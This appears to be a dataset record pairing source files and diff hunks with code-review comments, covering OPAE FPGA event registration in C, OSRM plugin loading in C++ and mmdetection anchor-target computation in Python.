EVEN IF ADVISED OF THE // POSSIBILITY OF SUCH DAMAGE. 
#ifdef HAVE_CONFIG_H #include <config.h> #endif // HAVE_CONFIG_H #include "common_int.h" #include <sys/socket.h> #include <sys/un.h> #include <sys/eventfd.h> #include <errno.h> #include "safe_string/safe_string.h" #include "opae/access.h" #include "opae/properties.h" #include "types_int.h" #include "intel-fpga.h" #define EVENT_SOCKET_NAME "/tmp/fpga_event_socket" #define EVENT_SOCKET_NAME_LEN 23 #define MAX_PATH_LEN 256 enum request_type { REGISTER_EVENT = 0, UNREGISTER_EVENT = 1 }; struct event_request { enum request_type type; fpga_event_type event; char device[MAX_PATH_LEN]; }; fpga_result send_event_request(int conn_socket, int fd, struct event_request *req) { struct msghdr mh; struct cmsghdr *cmh; struct iovec iov[1]; char buf[CMSG_SPACE(sizeof(int))]; ssize_t n; int *fd_ptr; /* set up ancillary data message header */ iov[0].iov_base = req; iov[0].iov_len = sizeof(*req); memset(buf, 0x0, sizeof(buf)); mh.msg_name = NULL; mh.msg_namelen = 0; mh.msg_iov = iov; mh.msg_iovlen = sizeof(iov) / sizeof(iov[0]); mh.msg_control = buf; mh.msg_controllen = CMSG_LEN(sizeof(int)); mh.msg_flags = 0; cmh = CMSG_FIRSTHDR(&mh); cmh->cmsg_len = CMSG_LEN(sizeof(int)); cmh->cmsg_level = SOL_SOCKET; cmh->cmsg_type = SCM_RIGHTS; fd_ptr = (int *)CMSG_DATA(cmh); *fd_ptr = fd; /* send ancillary data */ n = sendmsg(conn_socket, &mh, 0); if (n < 0) { FPGA_ERR("sendmsg failed: %s", strerror(errno)); return FPGA_EXCEPTION; } return FPGA_OK; } static fpga_result send_fme_event_request(fpga_handle handle, fpga_event_handle event_handle, int fme_operation) { int fd = FILE_DESCRIPTOR(event_handle); struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct fpga_fme_info fme_info = {.argsz = sizeof(fme_info), .flags = 0 }; struct fpga_fme_err_irq_set fme_irq = {.argsz = sizeof(fme_irq), .flags = 0}; if (fme_operation != FPGA_IRQ_ASSIGN && fme_operation != FPGA_IRQ_DEASSIGN) { FPGA_ERR("Invalid FME operation requested"); return FPGA_INVALID_PARAM; } if (ioctl(_handle->fddev, 
FPGA_FME_GET_INFO, &fme_info) != 0) { FPGA_ERR("Could not get FME info: %s", strerror(errno)); return FPGA_EXCEPTION; } /*capability field is set to 1 if the platform supports interrupts*/ if (fme_info.capability & FPGA_FME_CAP_ERR_IRQ) { if (fme_operation == FPGA_IRQ_ASSIGN) fme_irq.evtfd = fd; else fme_irq.evtfd = -1; if (ioctl(_handle->fddev, FPGA_FME_ERR_SET_IRQ, &fme_irq) != 0) { FPGA_ERR("Could not set eventfd %s", strerror(errno)); return FPGA_EXCEPTION; } } else { FPGA_ERR("FME interrupts not supported in hw"); return FPGA_EXCEPTION; } return FPGA_OK; } static fpga_result send_port_event_request(fpga_handle handle, fpga_event_handle event_handle, int port_operation) { int fd = FILE_DESCRIPTOR(event_handle); struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct fpga_port_info port_info = {.argsz = sizeof(port_info), .flags = 0 }; struct fpga_port_err_irq_set port_irq = {.argsz = sizeof(port_irq), .flags = 0}; if (port_operation != FPGA_IRQ_ASSIGN && port_operation != FPGA_IRQ_DEASSIGN) { FPGA_ERR("Invalid PORT operation requested"); return FPGA_INVALID_PARAM; } if (ioctl(_handle->fddev, FPGA_PORT_GET_INFO, &port_info) != 0) { FPGA_ERR("Could not get PORT info"); return FPGA_EXCEPTION; } /*capability field is set to 1 if the platform supports interrupts*/ if (port_info.capability & FPGA_PORT_CAP_ERR_IRQ) { if (port_operation == FPGA_IRQ_ASSIGN) port_irq.evtfd = fd; else port_irq.evtfd = -1; if (ioctl(_handle->fddev, FPGA_PORT_ERR_SET_IRQ, &port_irq) != 0) { FPGA_ERR("Could not set eventfd"); return FPGA_EXCEPTION; } } else { FPGA_ERR("PORT interrupts not supported in hw"); return FPGA_EXCEPTION; } return FPGA_OK; } static fpga_result send_uafu_event_request(fpga_handle handle, fpga_event_handle event_handle, uint32_t flags, int uafu_operation) { int fd = FILE_DESCRIPTOR(event_handle); struct _fpga_event_handle *_eh = (struct _fpga_event_handle *)event_handle; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct fpga_port_info 
port_info = {.argsz = sizeof(port_info), .flags = 0 }; struct fpga_port_uafu_irq_set uafu_irq = {.argsz = sizeof(uafu_irq), .flags = 0}; if (uafu_operation != FPGA_IRQ_ASSIGN && uafu_operation != FPGA_IRQ_DEASSIGN) { FPGA_ERR("Invalid UAFU operation requested"); return FPGA_INVALID_PARAM; } if (ioctl(_handle->fddev, FPGA_PORT_GET_INFO, &port_info) != 0) { FPGA_ERR("Could not get PORT info"); return FPGA_EXCEPTION; } /*capability field is set to 1 if the platform supports interrupts*/ if (port_info.capability & FPGA_PORT_CAP_UAFU_IRQ) { if (flags >= port_info.num_uafu_irqs) { FPGA_ERR("Invalid User Interrupt vector id"); return FPGA_INVALID_PARAM; } if (uafu_operation == FPGA_IRQ_ASSIGN) { uafu_irq.evtfd[0] = fd; uafu_irq.start = flags; _eh->flags = flags; } else { uafu_irq.start = _eh->flags; uafu_irq.evtfd[0] = -1; } uafu_irq.count = 1; if (ioctl(_handle->fddev, FPGA_PORT_UAFU_SET_IRQ, &uafu_irq) != 0) { FPGA_ERR("Could not set eventfd"); return FPGA_EXCEPTION; } } else { FPGA_ERR("UAFU interrupts not supported in hw"); return FPGA_EXCEPTION; } return FPGA_OK; } static fpga_result get_handle_objtype(fpga_handle handle, fpga_objtype *objtype) { fpga_result res = FPGA_OK; fpga_result destroy_res = FPGA_OK; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_token *_token; fpga_properties prop = NULL; /*_handle->lock mutex is not locked since it will be locked by the calling functions*/ _token = (struct _fpga_token *)_handle->token; res = fpgaGetProperties(_token, &prop); if (res != FPGA_OK) { FPGA_MSG("Could not get FPGA properties"); return res; } res = fpgaPropertiesGetObjectType(prop, objtype); if (res != FPGA_OK) FPGA_MSG("Could not determine FPGA object type"); destroy_res = fpgaDestroyProperties(&prop); if (destroy_res != FPGA_OK) FPGA_MSG("Could not destroy FPGA properties"); return res; } static fpga_result check_interrupts_supported(fpga_handle handle) { fpga_result res = FPGA_OK; fpga_result destroy_res = FPGA_OK; struct _fpga_handle 
*_handle = (struct _fpga_handle *)handle; struct _fpga_token *_token; fpga_properties prop = NULL; fpga_objtype objtype; struct fpga_fme_info fme_info = {.argsz = sizeof(fme_info), .flags = 0 }; struct fpga_port_info port_info = {.argsz = sizeof(port_info), .flags = 0 }; /*_handle->lock mutex is not locked since it will be locked by the calling functions*/ _token = (struct _fpga_token *)_handle->token; res = fpgaGetProperties(_token, &prop); if (res != FPGA_OK) { FPGA_MSG("Could not get FPGA properties"); return res; } res = fpgaPropertiesGetObjectType(prop, &objtype); if (res != FPGA_OK) { FPGA_MSG("Could not determine FPGA object type"); goto destroy_prop; } if (objtype == FPGA_DEVICE) { if (ioctl(_handle->fddev, FPGA_FME_GET_INFO, &fme_info) != 0) { FPGA_ERR("Could not get FME info: %s", strerror(errno)); res = FPGA_EXCEPTION; goto destroy_prop; } if (fme_info.capability & FPGA_FME_CAP_ERR_IRQ) { res = FPGA_OK; } else { FPGA_ERR("Interrupts not supported in hw"); res = FPGA_NOT_SUPPORTED; } } else if (objtype == FPGA_ACCELERATOR) { if (ioctl(_handle->fddev, FPGA_PORT_GET_INFO, &port_info) != 0) { FPGA_ERR("Could not get PORT info: %s", strerror(errno)); res = FPGA_EXCEPTION; goto destroy_prop; } if (port_info.capability & FPGA_PORT_CAP_ERR_IRQ) { res = FPGA_OK; } else { FPGA_ERR("Interrupts not supported in hw"); res = FPGA_NOT_SUPPORTED; } } destroy_prop: destroy_res = fpgaDestroyProperties(&prop); if (destroy_res != FPGA_OK) { FPGA_MSG("Could not destroy FPGA properties"); return destroy_res; } return res; } static fpga_result driver_register_event(fpga_handle handle, fpga_event_type event_type, fpga_event_handle event_handle, uint32_t flags) { fpga_objtype objtype; fpga_result res = FPGA_OK; res = check_interrupts_supported(handle); if (res != FPGA_OK) { FPGA_ERR("Could not determine whether interrupts are supported"); return FPGA_NOT_SUPPORTED; } res = get_handle_objtype(handle, &objtype); if (res != FPGA_OK) { FPGA_MSG("Could not determine FPGA object 
type"); return res; } switch (event_type) { case FPGA_EVENT_ERROR: res = get_handle_objtype(handle, &objtype); if (res != FPGA_OK) { FPGA_MSG("Could not determine FPGA object type"); return res; } if (objtype == FPGA_DEVICE) { return send_fme_event_request(handle, event_handle, FPGA_IRQ_ASSIGN); } else if (objtype == FPGA_ACCELERATOR) { return send_port_event_request(handle, event_handle, FPGA_IRQ_ASSIGN); } case FPGA_EVENT_INTERRUPT: if (objtype != FPGA_ACCELERATOR) { FPGA_MSG("User events need an accelerator object"); return FPGA_INVALID_PARAM; } return send_uafu_event_request(handle, event_handle, flags, FPGA_IRQ_ASSIGN); case FPGA_EVENT_POWER_THERMAL: FPGA_MSG("Thermal interrupts not supported"); return FPGA_NOT_SUPPORTED; default: FPGA_ERR("Invalid event type"); return FPGA_EXCEPTION; } } static fpga_result driver_unregister_event(fpga_handle handle, fpga_event_type event_type, fpga_event_handle event_handle) { fpga_objtype objtype; fpga_result res = FPGA_OK; res = check_interrupts_supported(handle); if (res != FPGA_OK) { FPGA_ERR("Could not determine whether interrupts are supported"); return FPGA_NOT_SUPPORTED; } res = get_handle_objtype(handle, &objtype); if (res != FPGA_OK) { FPGA_ERR("Could not determine FPGA object type"); return res; } switch (event_type) { case FPGA_EVENT_ERROR: if (objtype == FPGA_DEVICE) { return send_fme_event_request(handle, event_handle, FPGA_IRQ_DEASSIGN); } else if (objtype == FPGA_ACCELERATOR) { return send_port_event_request(handle, event_handle, FPGA_IRQ_DEASSIGN); } case FPGA_EVENT_INTERRUPT: if (objtype != FPGA_ACCELERATOR) { FPGA_MSG("User events need an Accelerator object"); return FPGA_INVALID_PARAM; } return send_uafu_event_request(handle, event_handle, 0, FPGA_IRQ_DEASSIGN); case FPGA_EVENT_POWER_THERMAL: FPGA_MSG("Thermal interrupts not supported"); return FPGA_NOT_SUPPORTED; default: FPGA_ERR("Invalid event type"); return FPGA_EXCEPTION; } } static fpga_result daemon_register_event(fpga_handle handle, fpga_event_type 
event_type, fpga_event_handle event_handle, uint32_t flags) { int fd = FILE_DESCRIPTOR(event_handle); fpga_result result = FPGA_OK; struct sockaddr_un addr; struct event_request req; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_token *_token = (struct _fpga_token *)_handle->token; errno_t e; UNUSED_PARAM(flags); if (_handle->fdfpgad < 0) { /* connect to event socket */ _handle->fdfpgad = socket(AF_UNIX, SOCK_STREAM, 0); if (_handle->fdfpgad < 0) { FPGA_ERR("socket: %s", strerror(errno)); return FPGA_EXCEPTION; } addr.sun_family = AF_UNIX; e = strncpy_s(addr.sun_path, sizeof(addr.sun_path), EVENT_SOCKET_NAME, EVENT_SOCKET_NAME_LEN); if (EOK != e) { FPGA_ERR("strncpy_s failed"); return FPGA_EXCEPTION; } if (connect(_handle->fdfpgad, (struct sockaddr *)&addr, sizeof(addr)) < 0) { FPGA_DBG("connect: %s", strerror(errno)); result = FPGA_NO_DAEMON; goto out_close_conn; } } /* create event registration request */ req.type = REGISTER_EVENT; req.event = event_type; e = strncpy_s(req.device, sizeof(req.device), _token->sysfspath, sizeof(_token->sysfspath)); if (EOK != e) { FPGA_ERR("strncpy_s failed"); result = FPGA_EXCEPTION; goto out_close_conn; } req.device[sizeof(req.device)-1] = '\0'; /* send event packet */ result = send_event_request(_handle->fdfpgad, fd, &req); if (result != FPGA_OK) { FPGA_ERR("send_event_request failed"); goto out_close_conn; } return result; out_close_conn: close(_handle->fdfpgad); _handle->fdfpgad = -1; return result; } static fpga_result daemon_unregister_event(fpga_handle handle, fpga_event_type event_type) { fpga_result result = FPGA_OK; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_token *_token = (struct _fpga_token *)_handle->token; struct event_request req; ssize_t n; errno_t e; if (_handle->fdfpgad < 0) { FPGA_MSG("No fpgad connection"); return FPGA_INVALID_PARAM; } req.type = UNREGISTER_EVENT; req.event = event_type; e = strncpy_s(req.device, sizeof(req.device), 
_token->sysfspath, sizeof(_token->sysfspath)); if (EOK != e) { FPGA_ERR("strncpy_s failed"); result = FPGA_EXCEPTION; goto out_close_conn; } req.device[sizeof(req.device)-1] = '\0'; n = send(_handle->fdfpgad, &req, sizeof(req), 0); if (n < 0) { FPGA_ERR("send : %s", strerror(errno)); result = FPGA_EXCEPTION; goto out_close_conn; } return result; out_close_conn: close(_handle->fdfpgad); _handle->fdfpgad = -1; return result; } fpga_result __FPGA_API__ fpgaCreateEventHandle(fpga_event_handle *event_handle) { struct _fpga_event_handle *_eh; fpga_result result = FPGA_OK; pthread_mutexattr_t mattr; int err = 0; ASSERT_NOT_NULL(event_handle); _eh = malloc(sizeof(struct _fpga_event_handle)); if (NULL == _eh) { FPGA_ERR("Could not allocate memory for event handle"); return FPGA_NO_MEMORY; } _eh->magic = FPGA_EVENT_HANDLE_MAGIC; /* create eventfd */ _eh->fd = eventfd(0, 0); if (_eh->fd < 0) { FPGA_ERR("eventfd : %s", strerror(errno)); result = FPGA_EXCEPTION; goto out_free; } if (pthread_mutexattr_init(&mattr)) { FPGA_MSG("Failed to initialized event handle mutex attributes"); result = FPGA_EXCEPTION; goto out_free; } if (pthread_mutexattr_settype(&mattr, PTHREAD_MUTEX_RECURSIVE)) { FPGA_MSG("Failed to initialize event handle mutex attributes"); result = FPGA_EXCEPTION; goto out_attr_destroy; } if (pthread_mutex_init(&_eh->lock, &mattr)) { FPGA_MSG("Failed to initialize event handle mutex"); result = FPGA_EXCEPTION; goto out_attr_destroy; } pthread_mutexattr_destroy(&mattr); *event_handle = (fpga_event_handle)_eh; return FPGA_OK; out_attr_destroy: err = pthread_mutexattr_destroy(&mattr); if (err) FPGA_ERR("pthread_mutexatr_destroy() failed: %s", strerror(err)); out_free: free(_eh); return result; } fpga_result __FPGA_API__ fpgaDestroyEventHandle(fpga_event_handle *event_handle) { struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) *event_handle; fpga_result result = FPGA_OK; int err = 0; result = event_handle_check_and_lock(_eh); if (result) return result; if 
(close(_eh->fd) < 0) { FPGA_ERR("eventfd : %s", strerror(errno)); err = pthread_mutex_unlock(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %S", strerror(err)); if (errno == EBADF) return FPGA_INVALID_PARAM; else return FPGA_EXCEPTION; } _eh->magic = FPGA_INVALID_MAGIC; err = pthread_mutex_unlock(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %S", strerror(err)); err = pthread_mutex_destroy(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_destroy() failed: %S", strerror(err)); free(*event_handle); *event_handle = NULL; return FPGA_OK; } fpga_result __FPGA_API__ fpgaGetOSObjectFromEventHandle(const fpga_event_handle eh, int *fd) { struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) eh; fpga_result result = FPGA_OK; int err = 0; result = event_handle_check_and_lock(_eh); if (result) return result; *fd = _eh->fd; err = pthread_mutex_unlock(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); return FPGA_OK; } fpga_result __FPGA_API__ fpgaRegisterEvent(fpga_handle handle, fpga_event_type event_type, fpga_event_handle event_handle, uint32_t flags) { fpga_result result = FPGA_OK; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) event_handle; struct _fpga_token *_token; int err; result = handle_check_and_lock(_handle); if (result) return result; result = event_handle_check_and_lock(_eh); if (result) goto out_unlock_handle; _token = (struct _fpga_token *)_handle->token; if (_token->magic != FPGA_TOKEN_MAGIC) { FPGA_MSG("Invalid token found in handle"); result = FPGA_INVALID_PARAM; goto out_unlock; } switch (event_type) { case FPGA_EVENT_INTERRUPT: if (!strstr(_token->devpath, "port")) { FPGA_MSG("Handle does not refer to accelerator object"); result = FPGA_INVALID_PARAM; goto out_unlock; } break; case FPGA_EVENT_ERROR: /* fall through */ case FPGA_EVENT_POWER_THERMAL: break; } /* TODO: reject unknown flags */ /* try driver first 
*/ result = driver_register_event(handle, event_type, event_handle, flags); if (result == FPGA_NOT_SUPPORTED) { result = daemon_register_event(handle, event_type, event_handle, flags); } out_unlock: err = pthread_mutex_unlock(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); out_unlock_handle: err = pthread_mutex_unlock(&_handle->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); return result; } fpga_result __FPGA_API__ fpgaUnregisterEvent(fpga_handle handle, fpga_event_type event_type, fpga_event_handle event_handle) { fpga_result result = FPGA_OK; int err; struct _fpga_handle *_handle = (struct _fpga_handle *)handle; struct _fpga_event_handle *_eh = (struct _fpga_event_handle *) event_handle; struct _fpga_token *_token; result = handle_check_and_lock(_handle); if (result) return result; result = event_handle_check_and_lock(_eh); if (result) goto out_unlock_handle; _token = (struct _fpga_token *)_handle->token; if (_token->magic != FPGA_TOKEN_MAGIC) { FPGA_MSG("Invalid token found in handle"); result = FPGA_INVALID_PARAM; goto out_unlock; } switch (event_type) { case FPGA_EVENT_INTERRUPT: if (!strstr(_token->devpath, "port")) { FPGA_MSG("Handle does not refer to accelerator object"); result = FPGA_INVALID_PARAM; goto out_unlock; } break; case FPGA_EVENT_ERROR: /* fall through */ case FPGA_EVENT_POWER_THERMAL: break; } /* try driver first */ result = driver_unregister_event(handle, event_type, event_handle); if (result == FPGA_NOT_SUPPORTED) { result = daemon_unregister_event(handle, event_type); } out_unlock: err = pthread_mutex_unlock(&_eh->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); out_unlock_handle: err = pthread_mutex_unlock(&_handle->lock); if (err) FPGA_ERR("pthread_mutex_unlock() failed: %s", strerror(err)); return result; }
1
14,509
The event handle is being passed by reference, so the dereference on 591 is actually correct. To follow the convention that variables be declared before executable statements, please change the code to the following: struct _fpga_event_handle *_eh; fpga_result result = FPGA_OK; int err = 0; if (!event_handle) { return FPGA_INVALID_PARAM; } _eh = (struct _fpga_event_handle *) *event_handle;
OPAE-opae-sdk
c
@@ -42,6 +42,7 @@ class named_mutex; #include "../plugins/nearest.hpp" #include "../plugins/timestamp.hpp" #include "../plugins/viaroute.hpp" +#include "../plugins/map_matching.hpp" #include "../server/data_structures/datafacade_base.hpp" #include "../server/data_structures/internal_datafacade.hpp" #include "../server/data_structures/shared_barriers.hpp"
1
/* Copyright (c) 2015, Project OSRM contributors All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ namespace boost { namespace interprocess { class named_mutex; } } #include "osrm_impl.hpp" #include "osrm.hpp" #include "../plugins/distance_table.hpp" #include "../plugins/hello_world.hpp" #include "../plugins/locate.hpp" #include "../plugins/nearest.hpp" #include "../plugins/timestamp.hpp" #include "../plugins/viaroute.hpp" #include "../server/data_structures/datafacade_base.hpp" #include "../server/data_structures/internal_datafacade.hpp" #include "../server/data_structures/shared_barriers.hpp" #include "../server/data_structures/shared_datafacade.hpp" #include "../util/make_unique.hpp" #include "../util/routed_options.hpp" #include "../util/simple_logger.hpp" #include <boost/assert.hpp> #include <boost/interprocess/sync/named_condition.hpp> #include <boost/interprocess/sync/scoped_lock.hpp> #include <osrm/route_parameters.hpp> #include <algorithm> #include <fstream> #include <utility> #include <vector> OSRM_impl::OSRM_impl(libosrm_config &lib_config) { if (lib_config.use_shared_memory) { barrier = osrm::make_unique<SharedBarriers>(); query_data_facade = new SharedDataFacade<QueryEdge::EdgeData>(); } else { // populate base path populate_base_path(lib_config.server_paths); query_data_facade = new InternalDataFacade<QueryEdge::EdgeData>(lib_config.server_paths); } // The following plugins handle all requests. 
RegisterPlugin(new DistanceTablePlugin<BaseDataFacade<QueryEdge::EdgeData>>( query_data_facade, lib_config.max_locations_distance_table)); RegisterPlugin(new HelloWorldPlugin()); RegisterPlugin(new LocatePlugin<BaseDataFacade<QueryEdge::EdgeData>>(query_data_facade)); RegisterPlugin(new NearestPlugin<BaseDataFacade<QueryEdge::EdgeData>>(query_data_facade)); RegisterPlugin(new TimestampPlugin<BaseDataFacade<QueryEdge::EdgeData>>(query_data_facade)); RegisterPlugin(new ViaRoutePlugin<BaseDataFacade<QueryEdge::EdgeData>>(query_data_facade)); } OSRM_impl::~OSRM_impl() { delete query_data_facade; for (PluginMap::value_type &plugin_pointer : plugin_map) { delete plugin_pointer.second; } } void OSRM_impl::RegisterPlugin(BasePlugin *plugin) { SimpleLogger().Write() << "loaded plugin: " << plugin->GetDescriptor(); if (plugin_map.find(plugin->GetDescriptor()) != plugin_map.end()) { delete plugin_map.find(plugin->GetDescriptor())->second; } plugin_map.emplace(plugin->GetDescriptor(), plugin); } int OSRM_impl::RunQuery(RouteParameters &route_parameters, osrm::json::Object &json_result) { const auto &plugin_iterator = plugin_map.find(route_parameters.service); if (plugin_map.end() == plugin_iterator) { return 400; } increase_concurrent_query_count(); plugin_iterator->second->HandleRequest(route_parameters, json_result); decrease_concurrent_query_count(); return 200; } // decrease number of concurrent queries void OSRM_impl::decrease_concurrent_query_count() { if (!barrier) { return; } // lock query boost::interprocess::scoped_lock<boost::interprocess::named_mutex> query_lock( barrier->query_mutex); // decrement query count --(barrier->number_of_queries); BOOST_ASSERT_MSG(0 <= barrier->number_of_queries, "invalid number of queries"); // notify all processes that were waiting for this condition if (0 == barrier->number_of_queries) { barrier->no_running_queries_condition.notify_all(); } } // increase number of concurrent queries void OSRM_impl::increase_concurrent_query_count() { 
if (!barrier) { return; } // lock update pending boost::interprocess::scoped_lock<boost::interprocess::named_mutex> pending_lock( barrier->pending_update_mutex); // lock query boost::interprocess::scoped_lock<boost::interprocess::named_mutex> query_lock( barrier->query_mutex); // unlock update pending pending_lock.unlock(); // increment query count ++(barrier->number_of_queries); (static_cast<SharedDataFacade<QueryEdge::EdgeData> *>(query_data_facade)) ->CheckAndReloadFacade(); } // proxy code for compilation firewall OSRM::OSRM(libosrm_config &lib_config) : OSRM_pimpl_(osrm::make_unique<OSRM_impl>(lib_config)) {} OSRM::~OSRM() { OSRM_pimpl_.reset(); } int OSRM::RunQuery(RouteParameters &route_parameters, osrm::json::Object &json_result) { return OSRM_pimpl_->RunQuery(route_parameters, json_result); }
1
14,206
reorder includes to be alphabetically ordered
Project-OSRM-osrm-backend
cpp
@@ -13,7 +13,8 @@ def anchor_target(anchor_list, cfg, gt_labels_list=None, cls_out_channels=1, - sampling=True): + sampling=True, + need_unmap=True): """Compute regression and classification targets for anchors. Args:
1
import torch from ..bbox import assign_and_sample, BBoxAssigner, SamplingResult, bbox2delta from ..utils import multi_apply def anchor_target(anchor_list, valid_flag_list, gt_bboxes_list, img_metas, target_means, target_stds, cfg, gt_labels_list=None, cls_out_channels=1, sampling=True): """Compute regression and classification targets for anchors. Args: anchor_list (list[list]): Multi level anchors of each image. valid_flag_list (list[list]): Multi level valid flags of each image. gt_bboxes_list (list[Tensor]): Ground truth bboxes of each image. img_metas (list[dict]): Meta info of each image. target_means (Iterable): Mean value of regression targets. target_stds (Iterable): Std value of regression targets. cfg (dict): RPN train configs. Returns: tuple """ num_imgs = len(img_metas) assert len(anchor_list) == len(valid_flag_list) == num_imgs # anchor number of multi levels num_level_anchors = [anchors.size(0) for anchors in anchor_list[0]] # concat all level anchors and flags to a single tensor for i in range(num_imgs): assert len(anchor_list[i]) == len(valid_flag_list[i]) anchor_list[i] = torch.cat(anchor_list[i]) valid_flag_list[i] = torch.cat(valid_flag_list[i]) # compute targets for each image if gt_labels_list is None: gt_labels_list = [None for _ in range(num_imgs)] (all_labels, all_label_weights, all_bbox_targets, all_bbox_weights, pos_inds_list, neg_inds_list) = multi_apply( anchor_target_single, anchor_list, valid_flag_list, gt_bboxes_list, gt_labels_list, img_metas, target_means=target_means, target_stds=target_stds, cfg=cfg, cls_out_channels=cls_out_channels, sampling=sampling) # no valid anchors if any([labels is None for labels in all_labels]): return None # sampled anchors of all images num_total_pos = sum([max(inds.numel(), 1) for inds in pos_inds_list]) num_total_neg = sum([max(inds.numel(), 1) for inds in neg_inds_list]) # split targets to a list w.r.t. 
multiple levels labels_list = images_to_levels(all_labels, num_level_anchors) label_weights_list = images_to_levels(all_label_weights, num_level_anchors) bbox_targets_list = images_to_levels(all_bbox_targets, num_level_anchors) bbox_weights_list = images_to_levels(all_bbox_weights, num_level_anchors) return (labels_list, label_weights_list, bbox_targets_list, bbox_weights_list, num_total_pos, num_total_neg) def images_to_levels(target, num_level_anchors): """Convert targets by image to targets by feature level. [target_img0, target_img1] -> [target_level0, target_level1, ...] """ target = torch.stack(target, 0) level_targets = [] start = 0 for n in num_level_anchors: end = start + n level_targets.append(target[:, start:end].squeeze(0)) start = end return level_targets def anchor_target_single(flat_anchors, valid_flags, gt_bboxes, gt_labels, img_meta, target_means, target_stds, cfg, cls_out_channels=1, sampling=True): inside_flags = anchor_inside_flags(flat_anchors, valid_flags, img_meta['img_shape'][:2], cfg.allowed_border) if not inside_flags.any(): return (None, ) * 6 # assign gt and sample anchors anchors = flat_anchors[inside_flags, :] if sampling: assign_result, sampling_result = assign_and_sample( anchors, gt_bboxes, None, None, cfg) else: bbox_assigner = BBoxAssigner(**cfg.assigner) assign_result = bbox_assigner.assign(anchors, gt_bboxes, None, gt_labels) pos_inds = torch.nonzero( assign_result.gt_inds > 0).squeeze(-1).unique() neg_inds = torch.nonzero( assign_result.gt_inds == 0).squeeze(-1).unique() gt_flags = anchors.new_zeros(anchors.shape[0], dtype=torch.uint8) sampling_result = SamplingResult(pos_inds, neg_inds, anchors, gt_bboxes, assign_result, gt_flags) num_valid_anchors = anchors.shape[0] bbox_targets = torch.zeros_like(anchors) bbox_weights = torch.zeros_like(anchors) labels = anchors.new_zeros(num_valid_anchors, dtype=torch.long) label_weights = anchors.new_zeros(num_valid_anchors, dtype=torch.float) pos_inds = sampling_result.pos_inds neg_inds = 
sampling_result.neg_inds if len(pos_inds) > 0: pos_bbox_targets = bbox2delta(sampling_result.pos_bboxes, sampling_result.pos_gt_bboxes, target_means, target_stds) bbox_targets[pos_inds, :] = pos_bbox_targets bbox_weights[pos_inds, :] = 1.0 if gt_labels is None: labels[pos_inds] = 1 else: labels[pos_inds] = gt_labels[sampling_result.pos_assigned_gt_inds] if cfg.pos_weight <= 0: label_weights[pos_inds] = 1.0 else: label_weights[pos_inds] = cfg.pos_weight if len(neg_inds) > 0: label_weights[neg_inds] = 1.0 # map up to original set of anchors num_total_anchors = flat_anchors.size(0) labels = unmap(labels, num_total_anchors, inside_flags) label_weights = unmap(label_weights, num_total_anchors, inside_flags) if cls_out_channels > 1: labels, label_weights = expand_binary_labels(labels, label_weights, cls_out_channels) bbox_targets = unmap(bbox_targets, num_total_anchors, inside_flags) bbox_weights = unmap(bbox_weights, num_total_anchors, inside_flags) return (labels, label_weights, bbox_targets, bbox_weights, pos_inds, neg_inds) def expand_binary_labels(labels, label_weights, cls_out_channels): bin_labels = labels.new_full( (labels.size(0), cls_out_channels), 0, dtype=torch.float32) inds = torch.nonzero(labels >= 1).squeeze() if inds.numel() > 0: bin_labels[inds, labels[inds] - 1] = 1 bin_label_weights = label_weights.view(-1, 1).expand( label_weights.size(0), cls_out_channels) return bin_labels, bin_label_weights def anchor_inside_flags(flat_anchors, valid_flags, img_shape, allowed_border=0): img_h, img_w = img_shape[:2] if allowed_border >= 0: inside_flags = valid_flags & \ (flat_anchors[:, 0] >= -allowed_border) & \ (flat_anchors[:, 1] >= -allowed_border) & \ (flat_anchors[:, 2] < img_w + allowed_border) & \ (flat_anchors[:, 3] < img_h + allowed_border) else: inside_flags = valid_flags return inside_flags def unmap(data, count, inds, fill=0): """ Unmap a subset of item (data) back to the original set of items (of size count) """ if data.dim() == 1: ret = 
data.new_full((count, ), fill) ret[inds] = data else: new_size = (count, ) + data.size()[1:] ret = data.new_full(new_size, fill) ret[inds, :] = data return ret
1
17,013
Rename `need_unmap` to `unmap`.
open-mmlab-mmdetection
py
